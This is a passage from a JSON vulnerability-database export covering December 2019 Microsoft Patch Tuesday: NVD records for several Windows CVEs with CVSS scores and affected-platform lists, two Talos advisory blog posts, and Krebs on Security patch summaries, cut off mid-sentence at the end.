"cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1469", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:58", "description": "A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers, aka 'Microsoft Defender Security Feature Bypass Vulnerability'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1488", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1488"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1488", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1488", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:25", "description": "An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1483.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1476", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1476", "CVE-2019-1483"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2019-1476", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1476", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-13T14:41:47", "description": "An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1476.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1483", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1476", "CVE-2019-1483"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1709"], "id": "CVE-2019-1483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1483", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*"]}], "talosblog": [{"lastseen": "2019-12-12T11:26:12", "description": "[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n \nMicrosoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 25 vulnerabilities, two of which are considered critical. \n \nThis month\u2019s security update covers security issues in a variety of Microsoft services and software, including Remote Desktop Protocol, Hyper-V and multiple Microsoft Office products. \n \nTalos also released a [new set of SNORT\u24c7 rules](<https://snort.org/advisories/talos-rules-2019-12-10>) that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2019/12/snort-rule-update-for-dec-10-2019.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed two critical vulnerabilities this month, both of which we will highlight below. \n \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>) is a remote code execution vulnerability in the Windows font library that exists due to the library improperly handling some embedded fonts. An attacker could exploit this bug by using a specially crafted, malicious embedded font on a web page, and then trick the user into visiting that web page. Alternatively, a user would need to open a specially crafted font file on their machine. \n \n[CVE-2019-1471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1471>) is a remote code execution vulnerability in the Hyper-V hypervisor. Hyper-V can sometimes fail to properly validate input from an authenticated user on a guest operating system. An attacker could exploit this vulnerability by running a specially crafted application on a guest OS, which would cause the Hyper-V host OS to execute arbitrary code on the host operating system. \n \n\n\n### Important vulnerabilities\n\nThis release also contains 23 important vulnerabilities, three of which we will highlight below. \n \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>) is an elevation of privilege vulnerability in Windows' Win32k component. An attacker could exploit this vulnerability by logging onto a system, then running a specially crafted application that would allow them to take complete control of the system and execute arbitrary code in kernel mode. Microsoft reports that this vulnerability has been used in the wild. \n \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1469>) is an information disclosure vulnerability in Windows that arises when the win32k component fails to provide kernel information. An attacker could exploit this vulnerability to obtain uninitialized memory and kernel memory, which could then be used in additional attacks. \n \n[CVE-2019-1485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1485>) is a remote code execution vulnerability in the VBscript engine. An attacker could exploit this vulnerability to corrupt memory of the affected system in a way that would allow them to execute arbitrary code in the context of the current user. To trigger this vulnerability, a user would have to visit a malicious, specially crafted website in the Internet Explorer web browser. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that utilizes Internet Explorer's rendering engine, and then trick the user into opening that file. \n \nThe other important vulnerabilities are: \n\n\n * [CVE-2019-1332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1332>)\n * [CVE-2019-1400](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1400>)\n * [CVE-2019-1453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1453>)\n * [CVE-2019-1461](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1461>)\n * [CVE-2019-1462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1462>)\n * [CVE-2019-1463](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1463>)\n * [CVE-2019-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1464>)\n * [CVE-2019-1465](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1465>)\n * [CVE-2019-1466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1466>)\n * [CVE-2019-1467](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1467>)\n * [CVE-2019-1470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1470>)\n * [CVE-2019-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1472>)\n * [CVE-2019-1474](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1474>)\n * [CVE-2019-1476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476>)\n * [CVE-2019-1477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1477>)\n * [CVE-2019-1478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1478>)\n * [CVE-2019-1480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1480>)\n * [CVE-2019-1481](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1481>)\n * [CVE-2019-1483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1483>)\n * [CVE-2019-1484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1484>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 52402, 52403, 52410, 52411, 52419, 52420\n\n", "cvss3": {}, "published": "2019-12-10T10:41:37", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Dec. 2019: Vulnerability disclosures and Snort coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-1332", "CVE-2019-1400", "CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1461", "CVE-2019-1462", "CVE-2019-1463", "CVE-2019-1464", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1477", "CVE-2019-1478", "CVE-2019-1480", "CVE-2019-1481", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1485"], "modified": "2019-12-10T10:41:37", "id": "TALOSBLOG:12856A82DEBDA69C67A87F8D8088BA8C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/qdY6qNdyflQ/microsoft-patch-tuesday-dec-2019.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T23:33:43", "description": "[](<https://1.bp.blogspot.com/-uoWpnLqDoEs/XVwJiM4lbuI/AAAAAAAAAEM/TJUmok7eaOopkKmoT-Q-iYbcLhiY4_9QgCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)\n\n_ \n__A Cisco Talos researcher discovered this vulnerability. Blog by Jon Munshaw._ \n \nCisco Talos recently discovered two issues in two implementations of Microsoft Remote Desktop Services: a denial-of-service vulnerability that affects Windows 7/Windows Server 2008 (when RDP 8.0 is enabled), Windows 8/Server 2012, and Windows 10/Server 2016. The Remote Desktop Protocol is used by Remote Desktop Services in order to allow a user or administrator to take control of a remote machine via a network connection. The denial-of-service vulnerability exists after the connection setup when one is able to perform the license exchange, and the information leak vulnerabilities exist during the connection setup of the process where the client and the server negotiate various aspects relevant to the session They could be exploited by an attacker to cause a denial of service or leak information, respectively. Microsoft disclosed these issues as part of December\u2019s Patch Tuesday. For more on the company\u2019s latest security updates, check out Talos\u2019 full blog here, and our Snort coverage here. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers. Microsoft is providing a patch for all of the affected versions of Windows with regards to the denial of service vulnerability but has declined to provide a patch for the Windows XP vulnerability due to the fact that it is out of support. It is recommended that users of Windows XP upgrade to a more recent operating system. \n \n\n\n### Vulnerability details\n\n** \n****Microsoft Remote Desktop Services (RDP8) license negotiation denial-of-service vulnerability (TALOS-2019-0901/CVE-2019-1453)** \n** \n**An exploitable denial-of-service vulnerability exists in the RDP8 implementation of Microsoft's Remote Desktop Services. A certain component of license negotiation can allow a remote client to read an arbitrary amount of memory that is controlled by the client. Due to this, a client can coerce the component to either make a repeatable controlled allocation or read from memory that is unmapped, resulting in a denial-of-service condition. An attacker can negotiate capabilities and then send a particular packet type in order to trigger this vulnerability. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0912>) for additional information. \n** \n****Microsoft Remote Desktop Services (RDP7) Windows XP multiple information leak vulnerabilities (TALOS-2019-0895/CVE-2019-1489)** \n** \n**Exploitable information leak vulnerabilities exist in the RDP7 implementation of Microsoft's Remote Desktop Services on Windows XP. Various aspects of the T.128 protocol, such as capability negotiation, can cause an information leak, which can provide an attacker with information about the target's address-space. An attacker can trigger these vulnerabilities by simply negotiating capabilities with the target via T.128 and examining the data that is returned. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0895>) for additional information. \n \n\n\n### Versions tested\n\nTalos tested and confirmed that Microsoft's Remote Desktop Services running on Windows 7 RdpCoreTS.dll, version 6.2.9200.22828, is affected by TALOS-2019-0901. TALOS-2019-0895 affects RDP on Windows XP only, running RDPWD.sys 5.1.2600.5512 and termdd.sys 5.1.2600.5512. \n** \n** \n\n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**Snort Rules:** 51649 \n \n", "cvss3": {}, "published": "2019-12-10T11:46:38", "type": "talosblog", "title": "Vulnerability Spotlight: Two vulnerabilities in RDP for Windows 7, XP", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1489"], "modified": "2019-12-10T11:46:38", "id": "TALOSBLOG:A51913DD094CF4C00A4B6C40275E22C3", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/E1O78eWMLPY/vuln-spotlight-RDP-Dec-19.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "krebs": [{"lastseen": "2019-12-14T23:20:57", "description": "**Microsoft** today released updates to plug three dozen security holes in its **Windows** operating system and other software. The patches include fixes for seven critical bugs \u2014 those that can be exploited by malware or miscreants to take control over a Windows system with no help from users -- as well as another flaw in most versions of Windows that is already being exploited in active attacks.\n\nBy nearly all accounts, the chief bugaboo this month is [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>), a vulnerability in a core Windows component (Win32k) that is present in Windows 7 through 10 and Windows Server 2008-2019. This bug is already being exploited in the wild, and according to **Recorded Future** the exploit available for it is similar to [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>), a Windows flaw reported in April that was found [being sold in underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\nCVE-2019-1458 is what's known as a \"privilege escalation\" flaw, meaning an attacker would need to previously have compromised the system using another vulnerability. Handy in that respect is [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>), a similarly widespread critical issue in the Windows font library that could be exploited just by getting the user to visit a hacked or malicious Web site.\n\n**Chris Goettl**, director of security at [Ivanti](<https://www.ivanti.com/resources/patch-tuesday>), called attention to a curious patch advisory Microsoft released today for [CVE-2019-1489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>), which is yet another weakness in the **Windows Remote Desktop Protocol** (RDP) client, a component of Windows that lets users view and manage their system from a remote computer. What's curious about this advisory is that it applies only to **Windows XP Service Pack 3**, which is no longer receiving security updates.\n\n\"The Exploitability Assessment for Latest Software Release and Older Software Release is 0, which is usually the value reserved for a vulnerability that is known to be exploited, yet the Exploited value was currently set to 'No' as the bulletin was released today,\" Goettl said. \"If you look at the Zero Day from this month ([CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)) the EA for Older Software Release is '0 - Exploitation Detected.' An odd discrepancy on top of a CVE advisory for an outdated OS. It is very likely this is being exploited in the wild.\"\n\nMicrosoft didn't release a patch for this bug on XP, and [its advisory on it](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>) is about as sparse as they come. But if you're still depending on Windows XP for remote access, you likely have bigger security concerns. Microsoft has patched [many critical RDP flaws](<https://krebsonsecurity.com/?s=rdp+2019+microsoft+patch&x=0&y=0>) in the past year. Even [the FBI last year encouraged users to disable it](<https://blog.netop.com/fbi-recommends-rdp-alternative>) unless needed, citing flawed encryption mechanisms in older versions and a lack of access controls which make RDP a frequent entry point for malware and ransomware.\n\nSpeaking of no-longer-supported Microsoft operating systems, **Windows 7** and **Windows Server 2008** will cease receiving security updates after the next decade's first Patch Tuesday comes to pass on January 14, 2020. While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nWindows 10 likes to install patches and sometimes feature updates all in one go and reboot your computer on its own schedule, but you don't have to accept this default setting. _Windows Central_ has [a useful guide](<https://www.windowscentral.com/how-stop-updates-installing-automatically-windows-10>) on how to disable or postpone automatic updates until you're ready to install them. For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not losing your mind when the odd buggy patch causes problems booting the system. So do yourself a favor and backup your files before installing any patches.\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may even chime in here with some helpful tips.\n\nFinally, once again there are no security updates for **Adobe Flash Player** this month (there is a non-security update available), but Adobe did release critical updates for Windows and macOS versions of its **Acrobat** and **PDF Reader** that fix more than 20 vulnerabilities in these products. **Photoshop** and **ColdFusion 2018** also received security updates today. Links to advisories [here](<https://blogs.adobe.com/psirt/?p=1813>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-11T01:51:25", "type": "krebs", "title": "Patch Tuesday, December 2019 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0859", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1489"], "modified": "2019-12-11T01:51:25", "id": "KREBS:537C1540357C1E3360A8168D22F44CB5", "href": "https://krebsonsecurity.com/2019/12/patch-tuesday-december-2019-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-13T02:27:43", "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\n\n\nMost concerning of this month&#x27;s batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft&#x27;s default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it&#x27;s not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n&quot;It could be as simple as sending a file,&quot; he said. &quot;The user doesn&#x27;t need to interact with anything, as Defender will access it as soon as it is placed on the system.&quot;\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2020-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in 